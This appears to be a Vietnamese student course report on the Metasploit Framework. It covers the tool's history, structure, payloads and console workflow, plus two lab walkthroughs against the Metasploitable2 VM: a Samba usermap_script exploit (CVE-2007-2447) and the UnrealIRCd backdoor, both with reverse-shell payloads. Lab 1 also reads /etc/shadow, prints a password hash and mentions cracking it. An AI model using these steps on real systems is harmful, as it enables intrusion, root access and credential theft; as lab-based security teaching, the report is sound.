1. Trang chủ
  2. » Giáo Dục - Đào Tạo

HỌC PHẦN: AN TOÀN MẠNG ĐỀ TÀI: CÔNG CỤ TẤN CÔNG METASPLOIT

35 16 0

Đang tải... (xem toàn văn)

Tài liệu hạn chế xem trước, để xem đầy đủ mời bạn chọn Tải xuống

THÔNG TIN TÀI LIỆU

Thông tin cơ bản

Định dạng
Số trang 35
Dung lượng 1,78 MB

Cấu trúc

  • CHƯƠNG 1: KHÁI QUÁT VỀ CÔNG CỤ METASPLOIT (8)
    • 1.1. Lịch sử ra đời (8)
    • 1.2. Giới thiệu sơ lược về Metasploit (9)
    • 1.3. Cấu trúc của Metasploit Framework (9)
  • CHƯƠNG 2: HƯỚNG DẪN SỬ DỤNG (16)
    • 2.1. Metasploit Web Interface (16)
    • 2.2. Metasploit Console (17)
      • 2.2.1. Khởi động Metasploit (17)
      • 2.2.2. Các câu lệnh trong Metasploit (18)
      • 2.2.3. Quy trình kiểm thử cơ bản trên Metasploit (21)
  • CHƯƠNG 3: KỊCH BẢN VÀ DEMO TẤN CÔNG BACKDOOR SỬ DỤNG METASLOIT (23)
    • 3.1. Sơ lược về backdoor (cửa hậu) và tấn công backdoor (23)
      • 3.1.1. Backdoor là gì? (23)
      • 3.1.2. Các loại backdoor (23)
      • 3.1.3. Những thao tác của kẻ tấn công khi mở được backdoor (23)
    • 3.2. LAB 1: Khai thác lỗi trên Samba cho phép mở shell chạy với quyền root (24)
      • 3.2.1 Kịch bản (24)
      • 3.2.2. Các bước thực hiện demo (25)
      • 3.2.3. Video demo (29)
    • 3.3. LAB 2: Khai thác cửa hậu trên UnrealIRCd (30)
      • 3.3.1 Kịch bản (30)
      • 3.3.2. Các bước thực hiện demo (31)

Nội dung

KHÁI QUÁT VỀ CÔNG CỤ METASPLOIT

Lịch sử ra đời

Ra đời năm 2003 bởi tác giả H.D.Moore, Metasploit Framework là một dự án bảo mật máy tính chuyên cung cấp thông tin về các lỗ hổng bảo mật và hỗ trợ khai thác những lỗ hổng này.

Moore đã phát hành phiên bản Metasploit đầu tiên – Power Metasploit vào năm

2003, chỉ với 11 lần khai thác

Với sự hỗ trợ từ Spoon M, Moore đã hoàn thiện một bản phác thảo tổng thể cho dự án Metasploit 2.0, được phát hành vào tháng 4 năm 2004 với 19 khai thác và 27 payloads.

Ngay sau lần phát hành này, Matt Miller đã tham gia vào nhóm phát triển

Metasploit, dự án sau đó được mở rộng và ngày càng nhận được nhiều sự ủng hộ từ các cộng đồng bảo mật danh tiếng

Sau khi hoàn thành việc chuyển đổi hoàn toàn sang ngôn ngữ lập trình Ruby, nhóm phát triển Metasploit đã phát hành phiên bản 3.0 vào năm 2007 Quá trình chuyển đổi từ Perl sang Ruby kéo dài 18 tháng, tạo ra 150.000 dòng mã nguồn mới Phiên bản 3.0 nhanh chóng được cộng đồng an toàn thông tin chấp nhận và ghi nhận sự gia tăng đáng kể về số lượng người dùng.

Năm 2009, Metasploit được Rapid7 – một công ty chuyên về bảo mật mua lại

Giới thiệu sơ lược về Metasploit

Metasploit Framework là công cụ mạnh mẽ chuyên dụng cho việc khai thác lỗ hổng bảo mật và phát triển hệ thống phát hiện xâm nhập Ban đầu, nó được phát triển bằng ngôn ngữ Perl, với các thành phần chính sử dụng C và Python Sau đó, dự án đã được viết lại hoàn toàn bằng Ruby, nhờ vào sự hỗ trợ của Matt Miller và Spoon.

Hiện nay, Metasploit Framework tiếp tục là một dự án mã nguồn mở có hơn

200.000 người dùng và cộng tác viên

Trên Kali Linux, Metasploit Framework được cài đặt mặc định, còn đối với một số hệ điều hành khác như Windows, MacOS,…người dùng cần cài đặt thủ công

Metasploit Framework có 3 phiên bản đã được phát hành: Metasploit Express, Metasploit Professional và Metasploit Community.

Cấu trúc của Metasploit Framework

Hình ảnh 1 Cấu trúc của Metasploit Framework

Thư mục chứa các tệp có thể chỉnh sửa được là nơi lưu trữ các tệp nhị phân cần thiết cho các hoạt động tấn công cụ thể, bao gồm danh sách từ ngữ, hình ảnh và nhiều tài liệu khác.

Hình ảnh 2: Thư mục Data

DOCUMENTATION: Thư mục này chứa các tệp tài liệu có sẵn về Metasploit

Hình ảnh 3: Thư mục Documentation

LIB: Thư mục lib chứa mã nguồn cơ sở của Metasploit

Hình ảnh 4: Thư mục Lib

Các module trong Metasploit Framework đóng vai trò quan trọng trong việc khai thác và kiểm tra khả năng tấn công Chúng bao gồm các module thực tế cho việc khai thác, chức năng phụ để đánh giá tính bảo mật, cũng như các module hỗ trợ mã hóa.

Hình ảnh 5: Thư mục Module

PLUGINS: Metasploit bao gồm rất nhiều plugins, nó là các đoạn chương trình nhỏ hỗ trọ trong quá trình sử dụng Metasploit

Hình ảnh 6:Thư mục Pugins

TOOLS: Nơi chứa các lệnh command-line tiện ích được sử dụng trong quá trình khai thác

Hình ảnh 7: Thư mục Tools

SCRIPTS: Nơi chứa meterpreter và các kịch bản mã khai thác

Hình ảnh 8: Thư mục Scripts

Ngoài ra, Metasploit Framework còn có các thư viện khác như:

REX: chứa các thư viện cơ bản cho mọi tác vụ của Metasploit

MSF:Core cung cấp một API quan trọng cho việc phát triển mã khai thác, giúp lập trình viên viết mã khai thác lỗ hổng cho ứng dụng Web một cách hiệu quả.

MSF:Base: thư viện này cung cấp các API được thiết kế cho việc phát triển giao diện

Các khái niệm quan trọng khi sử dụng Metasploit Framework:

LHOST: địa chỉ IP của máy tấn công

RHOST: địa chỉ IP của máy nạn nhân

LPORT: port được mở ra trên máy tấn công

RPORT: port trên máy nạn nhân

Khai thác (exploit) là hành động mà kẻ tấn công thực hiện một chuỗi lệnh nhắm vào lỗ hổng trong hệ thống hoặc ứng dụng, nhằm giành quyền truy cập trái phép Các hình thức khai thác phổ biến bao gồm khai thác lỗi tràn bộ đệm, chèn mã và khai thác lỗ hổng ứng dụng web.

Payload là các đoạn mã đơn giản mà kẻ tấn công sử dụng để tương tác với hệ thống mục tiêu Mỗi payload mang một shellcode với chức năng riêng biệt, cho phép kẻ tấn công chuyển dữ liệu từ máy cá nhân sang máy nạn nhân Cấu trúc cơ bản của payload bao gồm tên hệ điều hành, kiểu hệ thống, kiểu tấn công và giao thức tấn công.

- Tên hệ điều hành: android, windows,…

- Kiểu hệ thống: x86, x64,… (có thể có hoặc không)

- Kiểu tấn công: meterpreter, shell,…

- Giao thức: reverse_tcp, reverse_tcp_dns, reverse_https,…

- VD: windows/meterpreter/reverse_tcp_dns

Singles payload là những đoạn mã độc lập, hoạt động khép kín mà không cần kết nối với các thành phần khác Chúng thường được sử dụng cho các tác vụ đơn giản như thêm người dùng vào hệ thống hoặc khởi động một chương trình trên máy nạn nhân Loại payload này thường chỉ thực hiện một lần duy nhất.

Stagers là một loại payload tạo kết nối mạng giữa máy tấn công và máy nạn nhân, đảm bảo yêu cầu nhỏ gọn và xác thực tính khả thi của cuộc tấn công Chúng cũng được thiết kế để tải xuống các payload Stages.

- Stages: là các payload được tải xuống bởi Stagers Payload dạng này có kích thước lớn, có nhiều tùy chọn và chức năng khác nhau

Meterpreter là một payload nâng cao trong Metasploit Framework, được thiết kế để cung cấp các tập lệnh nhằm khai thác và tấn công các mục tiêu Payload này được phát triển từ các thành phần dưới dạng thư viện liên kết động (DLL files).

Meterpreter và các thành phần mở rộng của nó hoạt động hoàn toàn trong bộ nhớ mà không ghi lên đĩa, giúp tránh được sự phát hiện từ phần mềm chống virus.

Payload này cung cấp một tập lệnh để người sử dụng có thể khai thác trên mục tiêu:

- fs: cho phép tải lên hoặc tải xuống các tệp từ máy nạn nhân

- net: cho phép xem thông tin mạng của máy nạn nhân như IP, bảng định tuyến

- process: cho phép tạo các chương trình chạy mới trên máy bị tấn công

- sys: cho phép xem thông tin hệ thống của máy bị tấn công

Dưới đây là một ví dụ cơ bản để giúp chúng ta hiểu hơn về việc sử dụng payload trong Metasploit Framework:

- Máy tấn công: Kali Linux

Máy nạn nhân: Windows Server 2003 chứa lỗ hổng DCOM MS03-026, ảnh hưởng đến giao diện DCOM RPC của hệ điều hành NT của Microsoft Khi lỗ hổng này bị khai thác, sâu Blaster xuất hiện và tấn công với tốc độ cao, khiến các máy tính cá nhân kết nối Internet trực tiếp bị nhiễm, dẫn đến tình trạng shutdown và khởi động lại liên tục mà không thể khắc phục Để xử lý, cần tìm kiếm phương pháp khai thác hiệu quả nhất cho lỗ hổng này.

Hình ảnh 9: Ví dụ về sử dụng Payload 1

Sau đó, sử dụng câu lệnh sau để xem cách khai thác này có thể sử dụng được những payload nào msf > show payloads

Và ở đây, ta có thể sử dụng những payloads cho phép tải/thực thi các files, khiến máy nạn nhân là máy chủ VNC có thể xem được:

Hình ảnh 10: Ví dụ về sử dụng Payload 2

Lệnh trên giúp liệt kê các payloads cho phép tải/thực thi các files lên máy nạn nhân:

Để sử dụng Payload 3, bạn cần thực hiện câu lệnh: set PAYLOAD payload/path Tiếp theo, hãy thiết lập LHOST và LPORT, tương ứng với địa chỉ IP và cổng của máy tấn công Cuối cùng, cấu hình RHOST và RPORT với địa chỉ IP và cổng của máy nạn nhân.

Hình ảnh 12: Ví dụ về sử dụng Payload 4

Nhập câu lệnh exploit , một session sẽ được tạo ra và ta có thể thực hiện điều khiển/tấn công máy nạn nhân thông qua lỗ hổng DCOM MS03-026

Hình ảnh 13: Ví dụ về sử dụng Payload 5

HƯỚNG DẪN SỬ DỤNG

Metasploit Web Interface

Giao diện dựa trên trình duyệt này cung cấp menu điều hướng giúp người dùng dễ dàng sử dụng framework Người dùng có thể thực hiện nhiều chức năng như quét lỗ hổng, khởi chạy exploit, tạo báo cáo, định cấu hình hệ thống và thực hiện các tác vụ quản trị khác Mỗi chức năng đi kèm với một trang cấu hình riêng, hiển thị đầy đủ các tùy chọn và cài đặt cần thiết.

Khi người dùng thực hiện thao tác tạo một project , trang Overview (tổng quan) sẽ xuất hiện:

Hình ảnh 14: Giao diện Metasploit Web Interface

Trang này cung cấp thông tin thống kê cho dự án của người dùng, bao gồm số lượng máy chủ, dịch vụ được phát hiện, phiên và thông tin xác thực Lưu ý rằng số liệu thống kê sẽ chỉ được cập nhật sau khi người dùng quét mục tiêu hoặc nhập dữ liệu đã lưu Giao diện Web Metasploit còn tích hợp menu và tính năng điều hướng giữa các khu vực khác nhau.

Các trình duyệt được hỗ trợ bao gồm: Google Chrome 10+, Mozilla Firefox 18+, Internet Explorer 10+, Iceweasel 18+.

Metasploit Console

Metasploit Console là một công cụ tương tác dòng lệnh phổ biến trong giới kiểm thử viên và chuyên gia bảo mật, nhờ tính tiện lợi và chuyên nghiệp Bài viết này sẽ hướng dẫn sử dụng Metasploit Console, một phần tích hợp sẵn trong Kali Linux 2021.2.

Trong lần khởi động đầu tiên, thực thi lệnh msfdb init để tạo cơ sở dữ liệu cho metasploit

18 Để khởi động metasploit framework, sử dụng lệnh msfconsole

Hình ảnh 15: Giao diện khởi động Metasploit Console

Như hình trên, ta có Metasploit Console phiên bản v6.0.45, hỗ trợ 2134 lần khai thác và 592 payloads

2.2.2 Các câu lệnh trong Metasploit Để xem các câu lệnh cốt lõi được hỗ trợ và mô tả của những câu lệnh này, gõ help

Hình ảnh 16: Các câu lệnh của Metasploit Framework 1

Hình ảnh 17: Các câu lệnh của Metasploit Framework 2

Để cập nhật Metasploit Framework với các phương pháp khai thác lỗ hổng bảo mật mới nhất, hãy sử dụng lệnh "apt update" và "apt install metasploit-framework" Quá trình cập nhật sẽ mất khoảng vài phút để hoàn tất.

Hình ảnh 19: Câu lệnh cập nhật Metasploit

Trong danh sách các lệnh cơ bản của Metasploit, lệnh search là một trong những lệnh quan trọng và mạnh mẽ nhất, giúp người dùng tìm kiếm thông tin cần thiết về nhiều khía cạnh khác nhau.

Sau đây là mô tả chi tiết của câu lệnh này

Hình ảnh 20: Câu lệnh Search

VD: Tìm kiếm thông tin về tên các CVE được phát hiện và hỗ trợ năm 2020: msf > search cve:2020 -s name

Hình ảnh 21: Ví dụ về câu lệnh Search

Kết quả của câu lệnh trên là thông tin về 127 CVE năm 2020

2.2.3 Quy trình kiểm thử cơ bản trên Metasploit

Metasploit Framework có hai hình thức sử dụng chính: một là sử dụng các module để quét và tấn công các lỗ hổng bảo mật, hai là tạo mã độc và truyền mã vào máy nạn nhân, sau đó lừa nạn nhân kích hoạt mã độc đó.

Metasploit sử dụng hệ quản trị cơ sở dữ liệu PostgreSQL để lưu trữ cấu hình và payload cần thiết cho các nhiệm vụ kiểm thử Quá trình kiểm thử trên framework này diễn ra qua các bước cơ bản, đảm bảo hiệu quả trong việc phát hiện và khai thác lỗ hổng bảo mật.

Bước 1: Phát hiện, xác định các mục tiêu cần tấn công và thu thập thông tin về các mục tiêu đó

Bước 2: Lựa chọn một mục tiêu vừa tìm được ở bước 1 Dựa vào các thông tin mà

Module Auxiliary cung cấp khả năng tìm kiếm lỗ hổng và mã khai thác liên quan đến mục tiêu, sau đó xác thực sự tồn tại của các lỗ hổng này Trong giai đoạn này, người dùng có thể chủ yếu sử dụng Module auxiliary/scanner cùng với các công cụ quét khác như Nmap, vốn đã được tích hợp sẵn.

Bước 3: Lựa chọn module exploit: lựa chọn mã khai thác được Metasploit hỗ trợ, sử dụng một số câu lệnh sau:

- search: tìm kiểm các module liên quan đến mục tiêu cần kiểm thử

- show exploits: xem các module exploit mà framework hỗ trợ

- use exploit_name: chọn module exploit

- infor exploit_name: xem thông tin về module exploit

Bước 4: Cấu hình module exploit đã chọn và xác nhận những option vừa cấu hình

- show options: xác định những options nào cần cấu hình

- set: cấu hình cho những option của module đó

- check: kiểm tra xem những option đã được set chính xác hay chưa

Bước 5: Lựa chọn payload, đây là đoạn mã sẽ được thực thi trên hệ thống máy tính từ xa Để thực hiện bước này, hãy sử dụng các lệnh phù hợp.

- show payloads: liệt kê những payload của module exploit hiện tại

- info payload_name: xem thông tin chi tiết về payload đó

- set payload payload_name: xác định payload name, sau khi lựa chọn payload nào, dùng lệnh show option để xem những option của payload đó

- show advanced: xem những advanced option của payload đó

- exploit: lệnh dùng để thực thi payload, sau đó payload sẽ cung cấp cho người tấn công những thông tin về hệ thống được khai thác

Metasploit Framework không chỉ hỗ trợ người dùng trong việc sử dụng các module khai thác có sẵn, mà còn cung cấp khả năng mạnh mẽ để tự tạo các đoạn mã khai thác thông qua API của nó.

KỊCH BẢN VÀ DEMO TẤN CÔNG BACKDOOR SỬ DỤNG METASLOIT

Sơ lược về backdoor (cửa hậu) và tấn công backdoor

Cửa hậu (backdoor) trong phần mềm hoặc hệ thống máy tính là một cổng ẩn không được công khai, cho phép quản trị viên truy cập để khắc phục sự cố hoặc bảo trì hệ thống Thuật ngữ này cũng ám chỉ các cổng bí mật hoặc phần mềm gián điệp mà hacker sử dụng để xâm nhập trái phép vào thiết bị của người dùng.

Backdoor hợp pháp là những điểm truy cập hợp pháp được tích hợp vào hệ thống hoặc phần mềm, cho phép quản trị từ xa mà không được thông báo rộng rãi Những backdoor này thường được sử dụng cho mục đích bảo trì và có thể được bảo vệ bằng tên người dùng và mật khẩu cứng, trong khi một số khác cho phép thay đổi Chỉ có chủ hệ thống hoặc phần mềm mới biết về sự tồn tại của các cửa hậu này, tuy nhiên, chúng cũng tạo ra cơ hội cho kẻ tấn công khai thác và chiếm quyền điều khiển hệ thống.

Backdoor bất hợp pháp là một phương thức mà kẻ tấn công cài đặt lên hệ thống của nạn nhân, cho phép họ truy cập và điều khiển từ xa Mã độc được sử dụng thường là Trojan truy cập từ xa (RAT), giúp cài đặt thêm malware hoặc đánh cắp dữ liệu Loại backdoor này giúp kẻ tấn công vượt qua các hàng rào bảo mật, xâm nhập vào thiết bị và phần mềm Khi backdoor được cài đặt, một cổng dịch vụ tự động mở ra, cho phép kẻ tấn công kết nối từ xa và thực hiện các lệnh một cách dễ dàng.

3.1.3 Những thao tác của kẻ tấn công khi mở được backdoor

Hacker có thể khai thác thông tin cá nhân của người dùng, bao gồm tài khoản và mật khẩu, thông qua backdoor Hơn nữa, chúng còn sử dụng backdoor như một công cụ để cài đặt các phần mềm độc hại khác, chẳng hạn như ransomware, vào thiết bị.

LAB 1: Khai thác lỗi trên Samba cho phép mở shell chạy với quyền root

- Các công cụ, nền tảng cần sử dụng:

• Máy tấn công: Kali Linux (có tích hợp Metasploit Framework)

Máy victim được sử dụng trong bài viết này là Metasploitable2, một máy ảo Linux được thiết kế đặc biệt để tạo ra môi trường lỗ hổng Mục đích của Metasploitable2 là giúp người dùng thực hành kiểm thử và tấn công, mang lại cơ hội học hỏi về bảo mật mạng một cách hiệu quả.

- Bước 1: Phát hiện, xác định mục tiêu cần tấn công, thu thập thông tin: mục tiêu được đặt ra là victim Metasploitable2

- Bước 2: Chọn được mục tiêu, quét máy victim tìm ra các lỗ hổng tồn tại:

• Tìm địa chỉ IP của máy victim

+ Thực hiện tìm địa chỉ IP của victim bằng lệnh: ifconfig

• Kiểm tra kết nối mạng giữa các máy bằng lệnh: ping

+ Từ máy victim, sử dụng lệnh: ping

+ Từ máy tấn công, sử dụng lệnh: ping

• Sử dụng công cụ nmap (tích hợp sẵn trong Kali Linux) để rà quét các lỗ hổng tồn tại trên Metasploitable2

+ Quét cổng dịch vụ netbios-ssn port 139: nmap –script vuln -p139

+ Quét cổng dịch vụ microsoft-ds port 445: nmap –script vuln -p445

Để khai thác và tìm phiên bản Samba đang hoạt động, trước tiên khởi động Metasploit Tiếp theo, sử dụng module tấn công bằng lệnh: `msf > use auxiliary/scanner/smb/smb_version` Sau đó, chạy lệnh `show options` để xem thông tin về module tấn công Đặt địa chỉ IP của máy nạn nhân bằng lệnh: `msf > set RHOST `, và cuối cùng thực thi tấn công với lệnh: `msf > exploit`.

Dịch vụ Samba trên hệ điều hành Linux, sử dụng giao thức SMB (Server Message Block), cho phép chia sẻ file và máy in với các máy chạy Windows Việc liệt kê tên dịch vụ Samba và phiên bản là bước quan trọng trong việc xác định thông tin về dịch vụ này, nhằm phát hiện và khai thác các lỗ hổng bảo mật có thể bị tấn công.

Samba là một phần mềm mô phỏng hệ thống Windows, cho phép các hệ thống Unix/Linux kết nối vào "Network Neighborhood", từ đó người dùng Windows có thể truy cập và sử dụng tài nguyên trên các hệ thống Unix.

Lỗ hổng bảo mật CVE-2007-2447 trên dịch vụ chia sẻ file SMB, ảnh hưởng đến các phiên bản Samba từ 3.0.0 đến 3.0.25, cho phép thực thi mã từ xa, đặt hệ thống vào nguy cơ cao.

- Bước 3&4: Lựa chọn và cấu hình module exploit đã chọn

+ Khai báo sử dụng module tấn công: msf > use exploit/multi/samba/usermap_script

Chạy lệnh show options để xem các thông tin về module tấn công đang sử dụng

+ Đặt địa chỉ IP máy victim: msf > set RHOST

- Bước 5: Lựa chọn payload tấn công:

+ Chọn payload thực thi: msf > set payload cmd/unix/reverse

+ Đặt 445 là port truy cập máy victim msf > set RPORT 445

- Bước 6: Thực thi tấn công: msf> exploit

3.2.2 Các bước thực hiện demo

1 Cấu hình máy victim Metasploitable2:

Hình ảnh 22: Cấu hình máy Victim Metasploitable2 Đặt tên máy victim: AT074-NgoThanhHang

Tài khoản người dùng: username: hangntAT074 – password: 2508Aa@

2 Quét máy victim tìm lỗ hổng tồn tại:

Hình ảnh 23: Tìm địa chỉ IPv4 của máy victim

Kiểm tra kết nối giữa hai máy bằng lệnh ping :

Hình ảnh 24: Kiểm tra kết nối giữa Kali và victim

Hình ảnh 25: Kiểm tra kết nối giữa victim và Kali

Module auxiliary/scanner đang sử dụng;

Hình ảnh 26: Quét lỗ hổng với module auxiliary

Cấu hình module, set RHOST = 192.168.255.131, tìm được phiên bản

Samba mà máy victim đang sử dụng:

Hình ảnh 27: Cấu hình module auxiliary

3 Thực thi khai thác lỗi trên Samba cho phép mở shell chạy với quyền root:

Chọn module exploit sử dụng là exploit(multi/samba/usermap_script)

Hình ảnh 28: Lệnh show options

Lệnh show options dùng để xem thông tin về module đang sử dụng

Cấu hình module tấn công và set payload (cmd/unix/reverse)

Hình ảnh 29: Cấu hình module tấn công

4 Thực thi tấn công và lấy dữ liệu từ máy victim:

Exploit thành công, cửa hậu mở shell với người dùng root trên

Metasploitable2 cho phép điều khiển từ xa từ máy tấn công (Kali)

Hình ảnh 31: Kết quả tấn công của bài lab 1

Chạy các lệnh đọc tên người dùng và máy đang truy cập: whoami uname -a

Với kết quả của 2 câu lệnh này, người tấn công nhận được thông tin giống như thông tin chúng ta đã thiết lập cho máy victim ngay từ đầu

Câu lệnh lấy tên và mật khẩu đã tạo: cat /etc/shadow | grep hangntAT074

Kết quả nhận được: hangntAT074:$1$ZmIeRYvc$xmjoD.KfeOM5xkYC603Eq1:

Sử dụng John The Ripper để crack mật khẩu nhận được

Video demo được thực hiện tại link google drive sau: https://drive.google.com/file/d/1VRzSSgzzXPp414_Y7BlH1rv44o9OHSs0/view? usp=sharing

LAB 2: Khai thác cửa hậu trên UnrealIRCd

- Các công cụ, nền tảng cần sử dụng:

+ Máy tấn công: Kali Linux tích hợp Metasploit Framework

- Bước 1: Phát hiện, xác định mục tiêu cần tấn công, thu thập thông tin: mục tiêu được đặt ra là victim Metasploitable2

- Bước 2: Chọn được mục tiêu, quét máy victim tìm ra các lỗ hổng tồn tại:

• Tìm địa chỉ IP của máy victim

+ Thực hiện tìm địa chỉ IP của victim bằng lệnh: ifconfig

• Kiểm tra kết nối mạng giữa các máy bằng lệnh: ping

+ Từ máy victim, sử dụng lệnh: ping

+ Từ máy tấn công, sử dụng lệnh: ping

• Sử dụng công cụ nmap (tích hợp sẵn trong Kali Linux) để rà quét các lỗ hổng tồn tại trên Metasploitable2

Câu lệnh được sử dụng: nmap -sC

Cửa hậu được khai thác trong bài lab 2 này là cửa hậu tồn tại trên UnrealIRCd, một máy chủ nhắn tin hoạt động dựa trên giao thức IRC qua cổng TCP.

Công cụ này đã tồn tại một lỗ hổng bảo mật (cửa hậu) trong thời gian dài trước khi bị phát hiện Cửa hậu này sẽ được kích hoạt khi nhận được chuỗi ký tự “AB” cùng với một lệnh shell của hệ điều hành.

- Bước 3&4: Lựa chọn và cấu hình module exploit đã chọn

+ Khai báo sử dụng module tấn công: msf > use exploit/unix/irc/unreal_ircd_3281_backdoor

Chạy lệnh show options để xem các thông tin về module tấn công đang sử dụng

+ Đặt địa chỉ IP máy victim: msf > set RHOST

- Bước 5: Lựa chọn payload tấn công:

+ Chọn payload thực thi: msf > set payload cmd/unix/reverse_perl

- Bước 6: Thực thi tấn công: msf> exploit

3.3.2 Các bước thực hiện demo

1 Cấu hình máy victim Metasploitable2:

Hình ảnh 32: Cấu hình máy victim Metasploitable 2 Đặt tên máy victim: AT074-NgoThanhHang

Tài khoản người dùng: username: hangntAT074 – password: 2508Aa@

2 Quét máy victim tìm lỗ hổng tồn tại:

Hình ảnh 33: Tìm địa chỉ IPv4 của máy victim

Kiểm tra kết nối giữa hai máy bằng lệnh ping :

Hình ảnh 34: Kiểm tra kết nối giữa Kali và victim

Hình ảnh 35: Kiểm tra kết nối giữa victim và kali

Sử dụng nmap trên Kali để rà quét các lỗ hổng tồn tại trên máy victim

Hình ảnh 36: Sử dụng nmap quét lỗ hổng trên victim

Lỗ hổng Unreal tồn tại trên máy victim

3 Thực thi khai thác backdoor của UnrealIRCd

Sử dụng module exploit (unix/irc/unreal_ircd_3281_backdoor)

Hình ảnh 37: Chọn module tấn công lab 2

Lệnh show options dùng để xem thông tin về module đang sử dụng

Cấu hình module tấn công và set payload (cmd/unix/reverse_perl)

Hình ảnh 38: Cấu hình module tấn công lab 2

4 Tấn công và lấy dữ liệu từ máy victim

Hình ảnh 39: Tấn công lab 2 và kết quả

Video demo được thực hiện tại link google drive sau: https://drive.google.com/file/d/1ZPcPH7McHhR9U4rHN0e9bCubGW1ol58

Hoặc link: https://youtu.be/c0Fh_oV9kD8 (nếu link trên bị lỗi ạ)

34 ĐÁNH GIÁ VÀ KẾT LUẬN

Metasploit Framework là một công cụ kiểm thử mạnh mẽ, là trợ thủ đắc lực của mỗi chuyên gia an toàn bảo mật

Bài báo cáo đã cung cấp cái nhìn tổng quát về Metasploit, bao gồm các khái niệm cơ bản, cấu trúc và thành phần chính của framework này Từ đó, người đọc có thể nắm bắt các bước cần thiết để thực hiện kiểm thử hoặc tấn công hiệu quả bằng Metasploit.

Rapid7 đang không ngừng cải tiến và phát triển Metasploit, đảm bảo rằng công cụ này sẽ tiếp tục được ứng dụng rộng rãi trong tương lai, đặc biệt trong bối cảnh an toàn và bảo mật thông tin đang ngày càng trở nên quan trọng.

Ngày đăng: 09/02/2022, 13:25

TÀI LIỆU CÙNG NGƯỜI DÙNG

TÀI LIỆU LIÊN QUAN

w